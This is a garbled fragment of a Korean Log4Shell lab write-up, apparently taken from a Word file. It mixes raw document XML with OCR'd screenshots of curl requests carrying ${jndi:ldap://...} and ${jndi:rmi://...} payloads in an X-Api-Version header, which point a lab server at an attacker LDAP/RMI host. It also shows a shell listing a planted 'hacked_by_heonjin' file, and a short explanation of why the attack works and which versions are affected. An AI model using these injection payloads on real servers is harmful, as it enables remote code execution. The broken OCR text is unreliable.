&#10;• //192.168.186.2 : 8180/ExecTemp1ateJDK8. &#10;• / /192 .168.186.2: 8180/ExecTemD1ateJDK7. &#10;httD. &#10;class &#10;class &#10;class &#10;class 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######################### log4shell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익스플로잇</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> #########################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descr="[Hello , &#10;[Hello , &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello, &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello, &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello , &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello , &#10;127.0.0.1:8080 &#10;[Hello , &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello , &#10;127.0.0.1:8080 &#10;[Hello, &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;Hello, &#10;world ! &#10;world ! &#10;world ! &#10;world ! &#10;world ! &#10;world ! lhj@ubuntu: &#10;world ! &#10;world ! &#10;world ! lhj@ubuntu: &#10;world ! lhj@ubuntu : &#10;world ! &#10;world ! &#10;world ! &#10;world ! &#10;world ! &#10;world ! lhj@ubuntu : &#10;world ! &#10;lhj@ubuntu:- &#10;world ! &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;192.168.186.2:8080 -H 'X-Api-version: &#10;0 &#10;0 &#10;0 &#10;0 &#10;0 &#10;0 &#10;X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;${jndi. &#10;• //192.168.186.2: ' &#10;${jndi. &#10;• rmi://192.168.186.2: &#10;${jndi. &#10;• //192.168.186.2: &#10;${jndi: &#10;rmi:/ /192 .168.186.2: &#10;${jndi. &#10;• //192.168.186.2: 1389/yeok8u} &#10;${jndi: rmi://192.168.186.2: 1099/omhoj4' &#10;${jndi. &#10;• rmi://192.168.186.2: &#10;${jndi: &#10;rmi : / /192.168.186.2: 1099/39nd20} &#10;${jndi. &#10;${jndi. &#10;• : / /192 .168.186.2: 1099/yeok8u} &#10;${jndi. &#10;• rmi : / /192 .168.186.2: 1099/yeok8u} &#10;${jndi: /192.168.186.2: &#10;${jndi. &#10;• Idap: //192.168.186.2: &#10;${jndi. &#10;• rmi://192.168.186.2: &#10;${jndi: &#10;rmi:/ /192.168.186.2: &#10;${jndi. &#10;• Idap: //192.168.186.2: 1389/39nd20} " id="1" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="[Hello , &#10;[Hello , &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello, &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello, &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello , &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello , &#10;127.0.0.1:8080 &#10;[Hello , &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;[Hello , &#10;127.0.0.1:8080 &#10;[Hello, &#10;127. .0.1:8080 &#10;-H &#10;[Hello , &#10;127. .0.1:8080 &#10;Hello, &#10;world ! &#10;world ! &#10;world ! &#10;world ! &#10;world ! &#10;world ! lhj@ubuntu: &#10;world ! &#10;world ! &#10;world ! lhj@ubuntu: &#10;world ! lhj@ubuntu : &#10;world ! &#10;world ! &#10;world ! &#10;world ! &#10;world ! &#10;world ! lhj@ubuntu : &#10;world ! &#10;lhj@ubuntu:- &#10;world ! &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;curl &#10;192.168.186.2:8080 -H 'X-Api-version: &#10;0 &#10;0 &#10;0 &#10;0 &#10;0 &#10;0 &#10;X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;X—Api—Version: &#10;' X—Api—Version: &#10;X—Api—Version: &#10;${jndi. &#10;• //192.168.186.2: ' &#10;${jndi. &#10;• rmi://192.168.186.2: &#10;${jndi. &#10;• //192.168.186.2: &#10;${jndi: &#10;rmi:/ /192 .168.186.2: &#10;${jndi. &#10;• //192.168.186.2: 1389/yeok8u} &#10;${jndi: rmi://192.168.186.2: 1099/omhoj4' &#10;${jndi. &#10;• rmi://192.168.186.2: &#10;${jndi: &#10;rmi : / /192.168.186.2: 1099/39nd20} &#10;${jndi. &#10;${jndi. &#10;• : / /192 .168.186.2: 1099/yeok8u} &#10;${jndi. &#10;• rmi : / /192 .168.186.2: 1099/yeok8u} &#10;${jndi: /192.168.186.2: &#10;${jndi. &#10;• Idap: //192.168.186.2: &#10;${jndi. &#10;• rmi://192.168.186.2: &#10;${jndi: &#10;rmi:/ /192.168.186.2: &#10;${jndi. &#10;• Idap: //192.168.186.2: 1389/39nd20} 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취약한 서버에서 파일 생성 내역 확인 가능함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descr="/ # Is &#10;app/ &#10;hacked_by_heonjin &#10;I/ # rm &#10;/ # rm &#10;/ # Is &#10;/ # Is &#10;I/ # Is &#10;/ # Is &#10;/ # rm &#10;/ # Is &#10;/ # Is &#10;I/ # Is &#10;spring—boot—application. jar &#10;—r f app/ hacked_by_heonjin &#10;—r f app/ hacked_by_heonjin &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;hacked_by_heonjin &#10;spring—boot—application. jar &#10;—rf app/ hacked_by_heonjin &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;hacked_by_heonjin &#10;spring—boot—application. jar " id="2" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="/ # Is &#10;app/ &#10;hacked_by_heonjin &#10;I/ # rm &#10;/ # rm &#10;/ # Is &#10;/ # Is &#10;I/ # Is &#10;/ # Is &#10;/ # rm &#10;/ # Is &#10;/ # Is &#10;I/ # Is &#10;spring—boot—application. jar &#10;—r f app/ hacked_by_heonjin &#10;—r f app/ hacked_by_heonjin &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;hacked_by_heonjin &#10;spring—boot—application. jar &#10;—rf app/ hacked_by_heonjin &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;spring—boot—application. jar &#10;app/ &#10;hacked_by_heonjin &#10;spring—boot—application. jar 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 공격이 일어나는 이유?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Log4j 에서 로깅 기능을 사용할때 jdni lookup 기능이 사용되는데 그 과정에서 검증절차 없이 lookup을 통해 악성 Naming/Directory 서비스 서버에 접속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악성 서버에서 공격자의 원격 익스플로잇 코드를 다운 명령을 내림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C2서버에서 받은 익스플로잇 코드가 정상적인 서버에서 동작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 공격 조건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Log4j 버전 2.0 ~ 2.14.1 버전 사용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 6,7,8,11 버전에서만 공격이 발생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log4j 라이브러리 파일이 core가 아니라 api 인 경우 미발생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로깅을 사용하고 있어야함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